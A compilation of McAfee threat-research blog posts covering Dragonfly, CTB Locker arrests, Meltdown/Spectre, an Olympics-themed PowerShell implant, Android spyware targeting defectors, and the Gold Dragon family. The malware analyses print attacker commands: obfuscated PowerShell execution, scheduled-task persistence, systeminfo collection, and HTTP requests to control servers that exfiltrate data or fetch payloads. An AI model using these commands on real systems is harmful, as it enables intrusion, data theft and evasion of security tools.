Actor Sophistication

Our analysis of this attack tells a story about the actors’ capability and skills. Their attack precision is very good; they know whom and what to attack, using a variety of efforts. Their focus is on Windows systems and they use well-known practices to gather information and credentials. From our research, we have seen the evolution of the code in their backdoors and the reuse of code in their campaigns.

How well do the actors cover their tracks? We conclude they are fairly sophisticated in hiding details of their attacks, and in some cases in leaving details behind to either mislead or make a statement. We rate threat actors by scoring them in different categories; we have  mentioned a few. The Dragonfly group is in the top echelon of targeting attackers; it is critical that those in the targeted sectors be aware of them.

The Dragonfly group is most likely after intellectual property or insights into the sector they target, with the ability to take offensive disruptive and destructive action, as was reported in the 2015 attack on the Ukrainian power grid by a BlackEnergy malware family.

We would like to thank the team at Intezer for their assistance and support during our research.

The post Operation Dragonfly Analysis Suggests Links to Earlier Attacks appeared first on McAfee Blogs.

In our recent research, we interviewed the actors behind ransomware campaigns. One of the interesting findings was cybercriminals seemed to have a sense of absolute safety when conducting criminal operations. Cybercrime is an area of crime like no other, perceived as low-risk with high returns, which contributes greatly to its rapid growth.

Today, with the arrest of individuals suspected of infecting computer systems by spreading the CTB Locker malware, a clear message has been sent—involvement in cybercrime is not zero-risk.

CTB Locker

CTB Locker, also known as Critroni, is known as one of the largest ransomware families—helping to drive a new ransomware surge of 165 percent in 2015 as one of the top three ransomware families, and earning a spot as No. 1 just a year later. Operation Tovar, in which law enforcement agencies took down the infrastructure responsible for spreading CryptoLocker, created a need for more malware—CTB Locker and CryptoWall malware families helped to fill the gap.

In June 2014, the CTB Locker authors began to advertise the malware family on the underground scene at a cost of $3,000USD, where people could buy the first versions for $1,500USD. The authors also offered an affiliate program, which made CTB Locker infamous. By sharing a percentage of the received ransoms, the affiliates ran the greater risk—because they had to spread the ransomware—but they also enjoyed the higher profits. By using exploit kits and spam campaigns, the malware was distributed all over the world, mostly targeting “Tier 1” countries, those in which the victims could afford to pay and most likely would pay the ransom. Midway through 2015, we gained unique information from an affiliate server that helped us tremendously in the subsequent investigations.

Besides the use of an affiliate server in CTB Locker’s infrastructure, two other components complete the setup: a gateway server and a payment server.

Attacks Begin to Grow

During 2016, a massive spam campaign struck the Netherlands. Emails in Dutch seemed to originate from one of the largest telco providers. The emails claimed to have the latest bill attached. There was no bill, of course, rather CTB Locker asking for around $400USD of ransom to return files. The grammar and word usage was near perfect—not what we commonly observe—and the names in the email were proof of a well-prepared campaign. More than 200 cases in the Netherlands alone were filed with regards to these infections.

With attacks growing in number, the Dutch High Tech Crime Unit began an investigation. The unit approached McAfee’s Advanced Threat Research team to assist in identifying samples and answering questions.

Following our research, we were kept updated and were informed that in the early morning of December 14 operation “Bakovia” started. The initial research was on the CTB Locker ransomware but based on information from the U.S. Secret Service, it was determined that the same suspected gang was also linked to distribution of Cerber ransomware—another major family.

The Arrests

During the operation in East Romania, six houses were searched whereby the investigators seized a significant amount of hard-drives, laptops, external-storage, crypto-currency mining rigs, and hundreds of SIM cards. Suspects were arrested for allegedly spreading CTB Locker ransomware, and other suspects allegedly responsible for spreading Cerber were arrested at the airport in Bucharest.

Watch video of arrests. 

The law enforcement action emphasizes the value of public-private partnerships and underscores the determination behind the McAfee mantra “Together is power.”

The post McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker appeared first on McAfee Blogs.

The McAfee Advanced Threat Research (ATR) Team has closely followed the attack techniques that have been named Meltdown and Spectre throughout the lead-up to their announcement on January 3. In this post, McAfee ATR offers a simple and concise overview of these issues, to separate fact from fiction, and to provide insight into McAfee’s capabilities and approach to detection and prevention.

There has been considerable speculation in the press and on social media about the impact of these two new techniques, including which processors and operating systems are affected. The speculation has been based upon published changes to the Linux kernel. McAfee ATR did not want to add to any confusion until we could provide our customers and the general public solid technical analysis.

A fully comprehensive writeup comes from Google Project Zero in this informative technical blog, which allowed ATR to validate our conclusions. For more on McAfee product compatibility, see this business Knowledge Center article and this Consumer Support article.

The Techniques

Meltdown and Spectre are new techniques that build upon previous work, such as “KASLR”  and other papers that discuss practical side-channel attacks. The current disclosures build upon such side-channel attacks through the innovative use of speculative execution.

Speculative execution has been a feature of processors for at least a decade. Branch speculation is built on the Tomasulo algorithm. In essence, when a branch in execution depends upon a runtime condition, modern processors make a “guess” to potentially save time. This speculatively executed branch proceeds by employing a guess of the value of the condition upon which the branch must depend. That guess is typically based upon the last step of the same branch’s previous execution. The conditional value is cached for reuse in case that particular branch is taken again. There is no loss of computing time if the condition arrives at a new value because the processor must in any event wait for the value’s computation. Invalid speculative executions are thrown away. The fact that invalid speculations are tossed is a key attribute exploited by Meltdown and Spectre.

Despite the clearing of invalid speculative execution results without affecting memory or CPU registers, data from the execution may be retained in the processor caches. The retaining of invalid execution data is one of the properties of modern CPUs upon which Meltdown and Spectre depend. More information about the techniques is available on the site https://meltdownattack.com.

Because these techniques can be applied (with variation) to most modern operating systems (Windows, Linux, Android, iOS, MacOS, FreeBSD, etc.), you may ask, “How dangerous are these?” “What steps should an organization take?” and “How about individuals?” The following risk analysis is based upon what McAfee currently understands about Meltdown and Spectre.

There is already considerable activity in the security research community on these techniques. Sample code for two of the three variants was posted by the Graz University (in an appendix of the Spectre paper). Erik Bosman has also tweeted that he has built an exploit, though this code is not yet public. An earlier example of side-channel exploitation based upon memory caches was posted to GitHub in 2016 by one Meltdown-Spectre researcher Daniel Gruss. Despite these details, as of this writing no known exploits have yet been seen in the wild. McAfee ATR will continue to monitor researchers’ and attackers’ interest in these techniques and provide updates accordingly. Given the attack surface of nearly every modern computing system and the relative ease of exploitation, it is highly likely that at least one of the aforementioned variants will be weaponized very quickly.

McAfee researchers quickly compiled the public exploit code for Spectre and confirmed its efficacy across a number of operating systems, including Windows, Linux, and MacOS.

Weaponization

To assess the potential impact of any vulnerability or attack technique, we must first consider its value to attackers. These exploits are uniquely attractive to malicious groups or persons because the attack surface is nearly unprecedented, the attack vector is relatively new, and the impacts (privilege escalation and leaks of highly sensitive memory) are detrimental. The only naturally mitigating factor is that these exploits require local code execution. A number of third parties have already identified JavaScript as an applicable delivery point, meaning both attacks could theoretically be run from inside a browser, effectively opening an avenue of remote delivery. As always, JavaScript is a double-edged sword, offering a more user-friendly browsing experience, but also offering attackers an increased attack surface in the context of the browser’s executing scripted code.

Any technique that allows an attacker to cross virtual machine boundaries is of particular interest, because such a technique might allow an adversary to use a cloud virtual machine instance to attack other tenants of the cloud. Spectre is designed to foster attacks across application boundaries and hence applies directly to this problem. Thus, major cloud vendors have rushed to issue patches and software updates in advance of the public disclosure of these issues.

Additionally, both Meltdown and Spectre are exceptionally hard to detect as they do not leave forensic traces or halt program execution. This makes post-infection investigations and attack attribution much more complex.

Recommendations

Because we believe that Meltdown and Spectre may offer real-world adversaries significant value, we must consider how they can be used. There is no remote vector to these techniques; an attacker must first deliver code to the victim. To protect against malicious JavaScript, we always urge caution when browsing the Internet. Allow scripting languages to execute only from trusted sites. McAfee Windows Security Suite or McAfee Endpoint Security (ENS) can provide warnings if you visit a known dangerous site. These McAfee products can also provide an alternate script-execution engine that prevents known malicious scripts from executing.  As operating systems are changed to mitigate Meltdown and Spectre, organizations and individuals should apply those updates as soon as possible.

Even though we have not seen any malware currently exploiting these techniques, McAfee is currently evaluating opportunities to provide detection within the scope of our products; we expect most solutions to lie within processor and operating system updates. Based on published proofs of concept, we have provided some limited detection under the names OSX/Spectre, Linux/Spectre, and Trojan-Spectre.

Microsoft has released an out-of-cycle patch because of this disclosure:  https://support.microsoft.com/en-us/help/4056892/windows-10-update-kb4056892. Due to the nature of any patch or update, we suggest first applying manual updates on noncritical systems, to ensure compatibility with software that involves the potential use of low-level operating system features. McAfee teams are working to ensure compatibility with released patches where applicable.

While the world wonders about the potential impact of today’s critical disclosures, we also see a positive message. This was another major security flaw discovered and communicated by the information security community, as opposed to the discovery or leak of “in the wild” attacks. Will this disclosure have negative aspects? Most likely yes, but the overall effect is more global attention to software and hardware security, and a head start for the good guys on developing more robust systems and architectures for secure computing.

The post Decyphering the Noise Around ‘Meltdown’ and ‘Spectre’ appeared first on McAfee Blogs.

McAfee Advanced Threat Research analysts have discovered a campaign targeting organizations involved with the Pyeongchang Olympics.

Attached in an email was a malicious Microsoft Word document with the original file name 농식품부, 평창 동계올림픽 대비 축산악취 방지대책 관련기관 회의 개최.doc (“Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics”).

The primary target of the email was icehockey@pyeongchang2018.com, with several organizations in South Korea on the BCC line. The majority of these organizations had some association with the Olympics, either in providing infrastructure or in a supporting role. The attackers appear to be casting a wide net with this campaign.

The campaign to target Pyeongchang Olympics began December 22, 2017 with the most recent activity appearing December 28. The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file, and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script. They also wrote custom PowerShell code to decode the hidden image and reveal the implant.

Analysis

The malicious document was submitted from South Korea to Virus Total on December 29 at 09:04, a day after the original email was sent to the target list. The email was sent from the IP address 43.249.39.152, in Singapore, on December 28 at 23:34. The attacker spoofed the message to appear to be from info@nctc.go.kr, which is the National Counter-Terrorism Center (NCTC) in South Korea. The timing is interesting because the NCTC was in the process of conducting physical antiterror drills in the region in preparation for the Olympic Games. The spoofed source of this email suggests the message is legitimate and increases the chances that victims will treat it as such.

Based on our analysis of the email header, this message did not come from NCTC, rather from the attacker’s IP address in Singapore. The message was sent from a Postfix email server and originated from the hostname ospf1-apac-sg.stickyadstv.com. When the user opens the document, text in Korean tells the victim to enable content to allow the document to be opened in their version of Word.

The malicious document with instructions to enable content.

The enable content message.

The document contains an obfuscated Visual Basic macro:

Visual Basic macro.

The malicious document launches a PowerShell script when the user clicks “Enable Content.” The document was created on December 27 at 15:52 by the author “John.”

The malicious document launches the following PowerShell script:

Manually executing the PowerShell script at the command line.

The script downloads and reads an image file from a remote location and carves out a hidden PowerShell implant script embedded within the image file to execute.

The attackers used the open-source tool Invoke-PSImage, released December 20, to embed the PowerShell script into the image file. The steganography tool works by embedding the bytes of a script into the pixels of the image file, giving the attacker the ability to hide malicious PowerShell code in a visible image on a remote server. The following script can be identified as generated by Invoke-PSImage to execute the attacker’s implant in an image from a remote server.

The initial PowerShell script.

The image that contains the hidden PowerShell code.

To verify the usage of steganography, we employed the tool StegExpose to check the file:

The result confirms the presence of hidden data in our file.

Once the script runs, it passes the decoded script from the image file to the Windows command line in a variable $x, which uses cmd.exe to execute the obfuscated script and run it via PowerShell.

&&set  xmd=echo  iex (ls env:tjdm).value ^| powershell -noni  -noex  -execut bypass -noprofile  -wind  hidden     – && cmd   /C%xmd%

The extracted script is heavily disguised, using a combination of string-format operator obfuscation and other string-based obfuscation techniques.

The obfuscated PowerShell implant script.

The attacker’s objective is to make analysis difficult and to evade detection technologies that rely on pattern matching. Because the obfuscation makes use of native functions in PowerShell, the script can run in an obfuscated state and work correctly.

Obfuscated control servers.

When we deobfuscate the control server URLs, the implant establishes a connection to the following site over SSL:

hxxps://www.thlsystems.forfirst.cz:443/components/com_tags/views/login/process.php.

Based on our analysis, this implant establishes an encrypted channel to the attacker’s server, likely giving the attacker the ability to execute commands on the victim’s machine and to install additional malware. Ultimately this PowerShell implant will be set to automatically start daily at 2 am via a scheduled task (shown below). The view.hta contains the same PowerShell-based implant and establishes a remote connection over SSL to hxxps://200.122.181.63:443/components/com_tags/views/news.php.

C:\Windows\system32\schtasks.exe” /Create /F /SC DAILY /ST 14:00 /TN “MS Remoute Update” /TR C:\Users\Ops03\AppData\Local\view.hta

The contents of view.hta.

During our research, we discovered a cached Apache server log for the IP address 81.31.47.101, which is shared hosting. This log contained information for the control server thlsystems.forfirst.cz, which showed an IP address from South Korea connecting to the specific URL paths contained in the PowerShell implants. This indicates that the implant was active in South Korea and targets were likely being infected.

Apache server log from December 29, 2017.

While investigating thlsystems.forfirst.cz we discovered that the webpage belongs to a legitimate entity, suggesting this is a compromised server being used as both an encrypted backchannel for the attacker and the distribution of implants. The server also hosts a copy of the obfuscated PowerShell implant.

The implant establishes an encrypted channel to the following URL path:

hxxps://www.thlsystems.forfirst.cz:443/components/com_tags/views/admin/get.php

An image from December 30, 2017.

When investigating the IP address from the PowerShell implant 200.122.181.63 we found a server in Costa Rica that resolves to mafra.go.kr.jeojang.ga. The domain jeojang.ga was registered via Freenom, a free anonymous domain provider. It appears the attacker is using parts of a domain that belong to the South Korean Ministry of Agriculture and Forestry, which is in line with the attached document name in the email, but this domain has nothing to do with this government agency.

A version of the malicious document from December 22 embedded the PowerShell implant directly into the Word document in the form of an HTA file. McAfee Advanced Threat Research analysts discovered another document that was hosted at this domain; its original title is 위험 경보 (전국야생조류 분변 고병원성 AI(H5N6형) 검출).docx, which also appears to come from the Ministry of Agriculture and Forestry. This document was created on December 22 by the same author, “John.” The document does not contain macros, rather OLE streams for the embedded HTA files. When the Korean-language docx icon is clicked, it launches the embedded HTA file Error733.hta. This file contains the same script code to launch the PowerShell implant as in the view.hta example.

An earlier malicious document that relies on OLE streams.

Conclusion

The basic method in this case, an in-memory implant using PowerShell along with obfuscation to avoid detection, is a common and increasing popular fileless technique used in cyberattacks. We have not previously seen this kind of attack targeting victims in South Korea.

The use of the steganography tool shows how quickly the adversary has adapted to new tools. On December 20, the tool Invoke-PSImage was released to the public and within seven days was tested and deployed in a campaign targeting organizations involved in the 2018 Pyeongchang Olympics.

With the upcoming Olympics, we expect to see an increase in cyberattacks using Olympics-related themes. In similar past cases, the victims were targeted for their passwords and financial information. In this case the adversary is targeting the organizations involved in the Winter Olympics by using several techniques to make it more tempting to open the weaponized document:

• Spoofed email address from South Korea’s National Counter-Terrorism Council
• Use of Korean language
• Asking users to open the content because the document is in protected mode
• Partial use of the original South Korean Ministry of Agriculture and Forestry domain in a registered fake domain for malicious intent

The Advanced Threat Research team has discovered an increase in the use of weaponized Word documents against South Korean targets in place of the traditional use of weaponized documents exploiting vulnerabilities in the Hangul word processor software.

Indicators of compromise

SHA-1

• c388b693d10e2b84af52ab2c29eb9328e47c3c16
• 8ad0a56e3db1e2cd730031bdcae2dbba3f7aba9c

IPs

• 200.122.181.63

Domains

• thlsystems.forfirst.cz
• mafra.go.kr.jeojang.ga

The post Malicious Document Targets Pyeongchang Olympics appeared first on McAfee Blogs.

Recently, South Korean media wrote about North Korean refugees and journalists being targeted by unknown actors using KakaoTalk (a popular chat app in South Korea) and other social network services (such as Facebook) to send links to install malware on victims’ devices. This method shows that attackers are always looking for different ways to deliver malware.

The McAfee Mobile Research Team has acquired malicious APK files that were used in the targeted attacks. According to the articles, Google-shortened URLs were used to spread malware. We analyzed those statistics.

There are two versions of the dropper malware: “북한기도” (Pray for North Korea) and “BloodAssistant” (a health care app). In both cases, most clicks originated in South Korea and the most common browser and operating system combination was Chrome and Windows. (Android was the second most common.) The referrers diagram of BloodAssistant shows Facebook was used in 12% of cases to send the link to its targets.

In the case of the journalist who was targeted, the attacker sent a shortened link showing a thumbnail of another story written by the journalist, according to the news article. The link directs to ihoodtec[.]com/upload/newslist[.]php (now offline), which seems to be used for redirecting to links in other domains. This shortened URL was clicked by someone with an account at mail[.]police[.]go[.]kr, suggesting the shortened URL was also sent via email to the police address.

The number of clicks might not be meaningful because it can include access from malware researchers, but what is meaningful is that malware-download links were spread using different platforms: Facebook, KakaoTalk, email, etc.

Analysis

Dropper

All the malicious APK files (including additional variants) dropped the Trojan on the victim’s device. Although the apps look different, the dropper mechanism is identical. The following screens show the execution of the dropper files.

Figure 1: Screenshots of droppers.

When the dropper APK executes, it first checks whether the device is already infected. If not infected, it phishes the victim to turn on the accessibility permission. If the victim clicks the pop-up window, the view changes to the accessibility settings menu so the app can acquire the permission.

When the accessibility service starts, it overlays the window (by playing a video, for example) to hide the process of turning on required settings and dropping and installing the Trojan. The overlay is removed after the Trojan is installed. The following diagram explains the flow after executing the dropper malware.

Figure 2: Execution flow of the dropper.

Trojan

The dropped Trojan uses popular cloud services Dropbox and Yandex as a control server to upload data and receive commands. The following diagram explains the execution flow of the Trojan. The names of broadcast receivers and services (with some misspellings) may vary between samples but the execution is the same.

Figure 3: Execution flow of the Trojan.

When the dropped Trojan is installed, it saves device information in a temporary folder and uploads it to the cloud. It then downloads a file containing commands and other data to control the infected device. (We’ll explain the format of the downloaded file in the next section.) Most of the malicious behaviors—such as saving SMS, contact information, etc.—are implemented inside a separate dex file “core,” which is downloaded from the control server. This dex file is referenced in many places in the malware. The malicious functionality can be extended, as we’ll explain in the following section.

Command file structure

The command file has its own format. The following diagram explains the types of values. Offset designators are used to retrieve each value when parsing the file. The next table explains each value.

Figure 4: Command file format.

Figure 5: Command file values.

The handler for command code received from the cloud (CMD value) is implemented as a separate dex file and is downloaded either before or after the malware parses the command file. This mechanism allows the attacker to easily extend its malicious functionality without needing to update the whole malware.

Our analysis shows that only some of the commands are implemented now and uploaded to the cloud control server. Note Command 12 captures KakaoTalk chat logs.

Figure 6: Implemented commands.

Variants

We have found variants of the APKs that news articles initially reported on Google Drive. (The APKs on Google Drive are marked as malware and cannot be downloaded.) Some variants use different cloud services as their control servers while others drop the separate call-recording app “com.toh.callrecord” (assets/bbb). The following graph shows the relationships among variants and dropped files.

Figure 7: Relationships among variants.

The Actors

Initial malicious APKs we found were uploaded to Google Drive by the same account, and we found a connected social network account. By following activities of this account, we conclude with high confidence that this account was used to send shortened URLs to victims to get them to download malicious APK files.

The group behind this campaign is certainly familiar with South Korean culture, TV shows, drama, and the language because the account names associated with the cloud services are from Korean drama and TV shows, including the following:

Figure 8: Cloud service accounts.

We found the use of an interesting word, “피형” (“blood type”), which is not used in South Korea but is used in North Korea. (“혈액형” is the word for blood type in South Korea.) We also found a North Korean IP address in test log files of some Android devices that are connected to accounts used to spread the malware. However, Wi-Fi was on so we cannot exclude the possibility that the IP address is private.

By looking at the list of deleted folders in the cloud, we found one with the name “sun Team Folder,” possibly the name of the actors. This group has been active since 2016, according to the cloud storage creation date.

Figure 9: Deleted folder in the cloud.

Conclusion

This malware campaign is highly targeted, using social network services and KakaoTalk to directly approach targets and implant spyware. We cannot confirm who is behind this campaign, and the possible actor Sun Team is not related to any previously known cybercrime groups. The actors are familiar with South Korea and appear to want to spy on North Korean defectors, and on groups and individuals who help defectors.

McAfee Mobile Security detects this malware as Android/HiddenApp.BP. Always keep your mobile security application updated to the latest version, and never install applications from unverified sources. We recommend installing KakaoTalk only from Google Play. These habits will reduce the risk of infection by malware.

The post North Korean Defectors and Journalists Targeted Using Social Networks and KakaoTalk appeared first on McAfee Blogs.

A previously reported campaign purportedly carried out by Turkish hacker group “Ayyildiz Tim” targeting high-profile, verified Twitter accounts with the purpose of spreading Turkish political propaganda appears to have escalated within the last 24 hours. McAfee Advanced Threat Research has investigated the new events and discovered the following. On January 13, the Twitter account of the Indian ambassador to the United Nations was taken over and spread pro-Pakistan and pro-Turkey postings:

What seemed to be a single event soon became a targeted campaign that we discovered in cooperation with our partner SocialSafeGuard. Combining their technology and our threat researchers, we started to build a timeline of events:

In each case in this timeline, the account was restored after several hours.

Once the accounts were compromised, the attackers direct-messaged the account contacts with propaganda for their cause or with a link to convince them to click on a phishing site that would harvest the Twitter credentials of the victim.

One example of such a site is hxxp://fox-news.medianewsonline.com/.

Visiting the page shows the following:

If we look at the source code of the page, we discover several Turkish-language segments.

Focusing on the domains used for the phishing sites, we discovered more registered sites. Some examples:

• mypressonline.com
• official-twitter-jp.mypressonline.com
• feedbac-verifv.mypressonline.com

Who is behind this campaign? According to the messages used, the Turkish hacker group “Ayyildiz Tim” (AYT) claims to be responsible for the attacks. The group was founded in 2002 and advocates Turkish state ideology. In the following example, we see the background image of Greta van Susteren has changed to one of the many wallpapers used by the group:

We advise journalists in particular, as well as others in high-profile positions, to follow appropriate safeguards to protect their accounts.

• https://help.twitter.com/en/managing-your-account/two-factor-authentication

We are aware that one of the tactics from this group is to use Direct Messaging to communicate with other prominent Twitter accounts. There is also evidence that private messaging history has been accessed from certain compromised accounts of prominent figures, along with other sensitive or confidential information such as private phone numbers and emails.  If you receive a message, even from someone you know or trust, be aware that the message may not be from the person you know. It is potentially directing you to malicious content.

You absolutely should verify through an alternate channel that the link is safe to click.

The post Twitter Accounts of US Media Under Attack by Large Campaign appeared first on McAfee Blogs.

UPDATE (Feb. 12, 2018): A new variant of the original file-less implant appeared on Feb. 5, 2018, indicating the attack has resumed. The new variant has the same author and metadata as the original documents discovered in December, as well as a nearly identical implant. A key difference, however, is the attackers leveraged hacked servers is Santiago, Chile. See indicators of compromise for this update at the bottom of this post.

McAfee ATR has now discovered additional implants that are part of an operation to gain persistence for continued data exfiltration and for targeted access. We have named these implants, which appeared in December 2017, Gold Dragon, Brave Prince, Ghost419, and Running Rat, based on phrases in their code.

On December 24, 2017, our analysts observed the Korean-language implant Gold Dragon. We now believe this implant is the second-stage payload in the Olympics attack that ATR discovered January 6, 2018. The PowerShell implant used in the Olympics campaign was a stager based on the PowerShell Empire framework that created an encrypted channel to the attacker’s server. However, this implant required additional modules to be executed to be a fully capable backdoor. In addition, the PowerShell implant did not contain a mechanism to persist beyond a simple scheduled task. Gold Dragon has a much more robust persistence mechanism than the initial PowerShell implant and enables the attacker to do much more to the target system. Gold Dragon reappeared the same day that the Olympics campaign began.

The Gold Dragon malware appears to have expanded capabilities for profiling a target’s system and sending the results to a control server. The PowerShell implant had only basic data-gathering capabilities—such as username, domain, machine name, and network configuration—which are useful only for identifying interesting victims and launching more complex malware against them.

Gold Dragon

Gold Dragon is a data-gathering implant observed in the wild since December 24. Gold Dragon gets its name from the hardcoded domain www.golddragon.com, which we found throughout the samples.

This sample acts as a reconnaissance tool and downloader for subsequent payloads of the malware infection and payload chain. Apart from downloading and executing binaries from the control server, Gold Dragon generates a key to encrypt data that the implant obtains from the system. This URL is not used for control; the encrypted data is sent to the server ink.inkboom.co.kr, which was used by previous implants as early as May 2017.

Gold Dragon contains elements, code, and similar behavior to implants Ghost419 and Brave Prince, which we have tracked since May 2017. A DLL-based implant created on December 21 (the same day the first malicious Olympics document appeared) was downloaded by a Gold Dragon variant created December 24. This variant was created three days before the targeted spear phishing email with the second document that was sent to 333 victim organizations. The December 24 variant of Gold Dragon used the control server nid-help-pchange.atwebpages.com, which was also used by a Brave Prince variant from December 21.

The first variants of Gold Dragon appeared in the wild in South Korea in July 2017. The original Gold Dragon had the file name 한글추출.exe, which translates as Hangul Extraction and was seen exclusively in South Korea. Five variants of Gold Dragon compiled December 24 appeared heavily during the targeting of the Olympics organizations.

Analyzing Gold Dragon

As part of its initialization, Gold Dragon:

• Builds its imports by dynamically loading multiple APIs from multiple libraries
• Gains debug privileges (“SeDebugPrivilege”) for its own process to read remote memory residing in other processes

The malware does not establish persistence for itself but for another component (if it is found) on the system:

• The malware begins by looking for an instance of the Hangul word processor (HWP) running on the system. (HWP is a Korean word processor similar to Microsoft Word.)

Checking for HWP.exe in the process list.

• If HWP.exe is found running on the system, the malware finds the currently open file in HWP by extracting the file path from the command-line argument passed to HWP.exe
• This word file (usually named *.hwp) is copied into the temporary file path

C:\DOCUME~1\<username>\LOCALS~1\Temp\2.hwp

• hwp is an exact copy of the file loaded into HWP.exe
• The malware reads the contents of 2.hwp and finds an “MZ magic marker” in the file indicated by the string “JOYBERTM”

Checking for the MZ marker in the HWP file.

• This marker indicates the presence of an encrypted MZ marker in the .hwp file and is decrypted by the malware and written to the Startup folder for the user:

C:\Documents and Settings\<username>\Start Menu\Programs\Startup\viso.exe

• This step establishes the persistence of the malware across reboots on the endpoint
• Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint

The malware might perform this activity for a couple of reasons:

• Establish persistence for itself on the endpoint
• Establish persistence of another component of the malware on the endpoint
• Update itself on endpoint after a separate updater component downloads the update from the control server

The malware has limited reconnaissance and data-gathering capabilities and is not full-fledged spyware. Any information gathered from the endpoint is first stored in the following file, encrypted, and sent to the control server:

• C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server:

• Directory listing of the user’s Desktop folder using command:

cmd.exe /c dir C:\DOCUME~1\<username>\Desktop\ >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

• Directory listing of the user’s recently accessed files using command:

cmd.exe /c dir C:\DOCUME~1\<username>\Recent >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

• Directory listing of the system’s %programfiles% folder using command:

cmd.exe /c dir C:\PROGRA~1\ >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

• Systeminfo of the endpoint using command:

cmd.exe /c systeminfo >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

• Copies the file ixe000.bin from:

C:\Documents and Settings\<username>\Application Data\Microsoft\Windows\UserProfiles\ixe000.bin

To:

C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

• Registry key and value information for the current user’s Run key (with information collected):

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Number of subkeys

(<KeyIndex>) <KeyName>

Number of Values under each key including the parent Run key

(<ValueIndex>) <Value_Name> <Value_Content>

Registry Run key enumeration by Gold Dragon.

An example of 1.hwp with registry and system information:

Gold Dragon executes these steps executed in the exfiltration process:

• Once the malware has gathered the required data from the endpoint, it encrypts the data file 1.hwp using the password “www[dot]GoldDragon[dot]com”
• The encrypted content is written to the data file 1.hwp.
• During the exfiltration process, the malware Base64-encodes the encrypted data and sends it to its control server using an HTTP POST request to the URL:

http://ink[dot]inkboom.co.kr/host/img/jpg/post.php

• HTTP data/parameters used in the request include:
  • Content-Type: multipart/form-data; boundary=—-WebKitFormBoundar ywhpFxMBe19cSjFnG <followed by base64 encoded & encrypted system info>
  • User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)
  • Accept-Language: en-us
  • HTTP Version: HTTP/1.0

The malware can also download and execute additional components served to it by the control server. The mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request:

GET http://ink[dot]inkboom.co.kr/host/img/jpg/download.php?filename=<Computer_Name>_<username>&continue=dnsadmin

After successfully retrieving the component from the control server, the next-stage payload is copied to the Application Data directory of the current user and executed:

C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\hupdate.ex

(note “ex,” not “exe”)

The capability to download additional components from the control server.

The malware demonstrates its evasive behavior by checking for the presence of specific processes related to antimalware products:

• The presence of any process with the keywords “v3” and “cleaner.”

Checking for antimalware or cleaner processes.

• If found, these processes are terminated by sending a WM_CLOSE message to their windowing threads.

Terminating an antimalware/cleaner process.

Brave Prince

Brave Prince is a Korean-language implant that contains similar code and behavior to the Gold Dragon variants, specifically the system profiling and control server communication mechanism. The malware gathers detailed logs about the victim’s configuration, contents of the hard drive, registry, scheduled tasks, running processes, and more. Brave Prince was first observed in the wild December 13, 2017, sending logs to the attacker via South Korea’s Daum email service. Later variants posted the data to a web server via an HTTP post command, in the same way that Gold Dragon does.

The embedded domain braveprince.com.

The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. This file is sent as an attachment to the attacker’s email address. Later variants upload the file to a web server via an HTTP post command. The type of data this implant gathers from the victim’s system:

• Directories and files
• Network configuration
• Address resolution protocol cache
• Systemconfig to gather tasks

Both variants of Brave Prince can kill a process associated with a tool created by Daum that can block malicious code. This tool is exclusive to South Korea.

• taskkill /f /im daumcleaner.exe

The later variants of Brave Prince include the following hardcoded strings:

• c:\utils\c2ae_uiproxy.exe
• c:\users\sales\appdata\local\temp\dwrrypm.dl

Ghost419

Ghost419 is a Korean-language implant that first appeared in the wild December 18, 2017, with the most recent sample appearing two days before the Olympics spear phishing email. The malware can be identified by the hardcoded string and URL parameter passed to the control server. Ghost419 can be traced to a sample created July 29, 2017, that appears to be a much earlier version (without the hardcoded identifier). The July version shares 46% of its code with samples created in late December. This early version implant creates a unique mutex value (kjie23948_34238958_KJ238742) that also appears in a sample from December, with the exception that one digit has changed. Ghost419 is based on Gold Dragon and Brave Prince implants and contains shared elements and code, especially for system reconnaissance functions.

Hardcoded “Ghost419” in the malware binary.

The string “WebKitFormBoundarywhpFxMBe19cSjFnG,” part of the upload mechanism, also appears in the Gold Dragon variants of late December 2017.

Gold Dragon sample.

Ghost419 sample.

Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon.

Gold Dragon user agent string.

Ghost419 user agent string.

RunningRat

RunningRat is a remote access Trojan (RAT) that operates with two DLLs. It gets its name from a hardcoded string embedded in the malware. Upon being dropped onto a system, the first DLL executes. This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence. The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program. The batch file then attempts to remove itself.

The first DLL unpacks a resource file attached to the DLL using a zlib decompression algorithm. The authors of the malware left the debugging strings in the binary, making the algorithm easy to identify. The second DLL is decompressed in memory and never touches the user’s file system; this file is the main RAT that executes. Finally, the first DLL adds the registry key “SysRat,” at SoftWare\Microsoft\Windows\CurrentVersion\Run, to ensure the malware is executed at startup.

After the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server, effectively changing the address the malware will communicate with. This address is hardcoded in the second DLL as 200.200.200.13 and is modified by the first DLL to 223.194.70.136.

This type of behavior may indicate this code is being reused or is part of a malware kit.

The first DLL uses one common antidebugging technique by checking for SeDebugPrivilege.

Once the second DLL is executed, it gathers information about the victim system’s setup, such as operating system version, and driver and processor information.

The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs.

